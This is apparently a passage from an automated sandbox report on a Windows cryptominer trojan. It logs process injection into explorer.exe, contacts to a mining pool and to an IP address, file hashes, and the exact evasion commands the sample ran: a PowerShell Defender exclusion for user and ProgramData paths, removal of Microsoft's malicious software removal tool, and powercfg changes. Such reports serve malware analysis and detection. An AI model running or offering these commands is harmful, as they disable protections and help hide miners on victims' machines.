            Source: C:\Windows\System32\conhost.exeCode function: 36_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,36_2_0000000140001160

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 54.37.232.103 10343Jump to behavior
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeMemory written: PID: 3384 base: 140000000 value: 4DJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeMemory written: PID: 3384 base: 140001000 value: NUJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeMemory written: PID: 3384 base: 140665000 value: DFJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeMemory written: PID: 3384 base: 140834000 value: 00Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeMemory written: PID: 3384 base: DB2010 value: 00Jump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeThread register set: target process: 1132Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeThread register set: target process: 3384Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Modifies power options to not sleep / hibernate
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: explorer.exe, 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		11
            Windows Service            		11
            Windows Service            		1
            Masquerading            		OS Credential Dumping321
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Service Execution            		1
            DLL Side-Loading            		311
            Process Injection            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture1
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets13
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            File Deletion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546361 Sample: 12Jh49DCAj.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 58 xmr-eu1.nanopool.org 2->58 68 Multi AV Scanner detection for submitted file 2->68 70 Yara detected Xmrig cryptocurrency miner 2->70 72 Sigma detected: Stop EventLog 2->72 76 3 other signatures 2->76 8 jjlazghkkuth.exe 1 2->8         started        12 12Jh49DCAj.exe 1 2 2->12         started        14 svchost.exe 2->14         started        signatures3 74 DNS related to crypt mining pools 58->74 process4 file5 52 C:\Windows\Temp\ovabrjmyzhdo.sys, PE32+ 8->52 dropped 78 Multi AV Scanner detection for dropped file 8->78 80 Injects code into the Windows Explorer (explorer.exe) 8->80 82 Modifies the context of a thread in another process (thread injection) 8->82 84 Sample is not signed and drops a device driver 8->84 16 explorer.exe 8->16         started        20 powershell.exe 8->20         started        22 cmd.exe 8->22         started        30 5 other processes 8->30 54 C:\ProgramData\...\jjlazghkkuth.exe, PE32+ 12->54 dropped 86 Uses powercfg.exe to modify the power settings 12->86 88 Adds a directory exclusion to Windows Defender 12->88 90 Modifies power options to not sleep / hibernate 12->90 24 powershell.exe 23 12->24         started        26 cmd.exe 1 12->26         started        28 powercfg.exe 1 12->28         started        32 7 other processes 12->32 signatures6 process7 dnsIp8 56 54.37.232.103, 10343, 49710 OVHFR France 16->56 60 System process connects to network (likely due to code injection or exploit) 16->60 62 Query firmware table information (likely to detect VMs) 16->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->64 34 conhost.exe 20->34         started        46 2 other processes 22->46 66 Loading BitLocker PowerShell Module 24->66 36 conhost.exe 24->36         started        38 conhost.exe 26->38         started        40 wusa.exe 26->40         started        42 conhost.exe 28->42         started        48 4 other processes 30->48 44 conhost.exe 32->44         started        50 6 other processes 32->50 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            12Jh49DCAj.exe63%ReversingLabsWin64.Trojan.MintZard

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe63%ReversingLabsWin64.Trojan.MintZard
            C:\Windows\Temp\ovabrjmyzhdo.sys5%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            xmr-eu1.nanopool.org
            		51.15.65.182
            		truetrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://crl.cloudflare.com/origin_ca.crl0explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://ocsp.cloudflare.com/origin_caexplorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://crl.cloudflare.com/origin_ca.crlCexplorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://ocsp.cloudflare.com/origin_ca0explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://crl.cloudflare.com/origin_ca.crlexplorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        54.37.232.103
                        		unknownFrance
                        		16276OVHFRtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1546361
                        Start date and time:2024-10-31 20:10:11 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 36s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:45
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:12Jh49DCAj.exe
                        renamed because original name is a hash value
                        Original Sample Name:003342f9137c04ac86b94e7798a9b0ebe7cff13524bb191f7ac2472a059b442d.exe
                        Detection:MAL
                        Classification:mal100.spyw.evad.mine.winEXE@58/12@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 5
                        • Number of non-executed functions: 26
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: 12Jh49DCAj.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        15:11:03API Interceptor27x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        54.37.232.103file.exeGet hashmaliciousXmrigBrowse
                          Chrome.exeGet hashmaliciousXmrigBrowse
                            SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                              setup.exeGet hashmaliciousXmrigBrowse
                                SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  xmr-eu1.nanopool.orgKy4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                  • 51.15.58.224
                                  boooba.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.58.224
                                  2HUgVjrn3O.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.58.224
                                  SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.23.83
                                  Yf4yviDxwF.exeGet hashmaliciousXmrigBrowse
                                  • 54.37.232.103
                                  file.exeGet hashmaliciousXmrigBrowse
                                  • 54.37.137.114
                                  Q3Vq6yp33F.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.65.182
                                  2JkHiPgkLE.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.58.224
                                  file.exeGet hashmaliciousXmrigBrowse
                                  • 51.89.23.91
                                  eqkh9g37Yb.exeGet hashmaliciousXmrigBrowse
                                  • 146.59.154.106

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  OVHFREl9HaBFrFM.exeGet hashmaliciousBlank GrabberBrowse
                                  • 51.89.9.252
                                  https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                  • 54.37.62.77
                                  http://3d1.gmobb.jp/dcm299ccyag4e/gov/Get hashmaliciousPhisherBrowse
                                  • 178.32.210.226
                                  https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1Get hashmaliciousHTMLPhisherBrowse
                                  • 149.56.200.84
                                  segura.vbsGet hashmaliciousRemcosBrowse
                                  • 164.132.58.105
                                  asegurar.vbsGet hashmaliciousRemcosBrowse
                                  • 164.132.58.105
                                  file.exeGet hashmaliciousXmrigBrowse
                                  • 51.79.145.202
                                  https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                  • 51.75.86.98
                                  http://199.59.243.227Get hashmaliciousHTMLPhisherBrowse
                                  • 51.75.86.98
                                  https://gthr.uk/e8c3Get hashmaliciousUnknownBrowse
                                  • 51.89.232.103

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Windows\Temp\ovabrjmyzhdo.sysKy4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                    file.exeGet hashmaliciousXmrigBrowse
                                      boooba.exeGet hashmaliciousXmrigBrowse
                                        SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exeGet hashmaliciousXmrigBrowse
                                          2HUgVjrn3O.exeGet hashmaliciousXmrigBrowse
                                            SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                              Yf4yviDxwF.exeGet hashmaliciousXmrigBrowse
                                                file.exeGet hashmaliciousXmrigBrowse
                                                  SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeGet hashmaliciousXmrigBrowse
                                                    prog.exeGet hashmaliciousXmrigBrowse

                                                      Created / dropped Files

                                                      C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\12Jh49DCAj.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2630144
                                                      Entropy (8bit):6.547140340840566
                                                      Encrypted:false
                                                      SSDEEP:49152:KMv8tD+YOamKt4XZo5SUUxf8FnXVj7mJ5Ls6il6Sqd:/v8t+YJqUU2hXAJ5Lg6Sqd
                                                      MD5:A44C57DED5F0E75DD398F8BDE8C83219
                                                      SHA1:B46A7F6D001C9E06B7DCC39A926130FB791F4663
                                                      SHA-256:003342F9137C04AC86B94E7798A9B0EBE7CFF13524BB191F7AC2472A059B442D
                                                      SHA-512:244D584D9AD19123C5D251B1347449460FC3C47B61DE7A9880AF87FFADABDBE0270CB75B972907BF534F50AEBE341D7EC77CB586F51C6BB02A3524197F39E031
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...-( g.........."......|....'.....@..........@..............................(.......(...`.................................................8...<....p(......@(...............(.x...............................(.......8..............X............................text....z.......|.................. ..`.rdata..............................@..@.data...`.'......z'.................@....pdata.......@(.......(.............@..@.00cfg.......P(.......(.............@..@.tls.........`(.......(.............@....rsrc........p(.......(.............@..@.reloc..x.....(...... (.............@..B........................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllul3nqth:NllUa
                                                      MD5:851531B4FD612B0BC7891B3F401A478F
                                                      SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                      SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                      SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                      Malicious:false
                                                      Preview:@...e.................................&..............@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eivlhemw.dcb.ps1

                                                      Download File
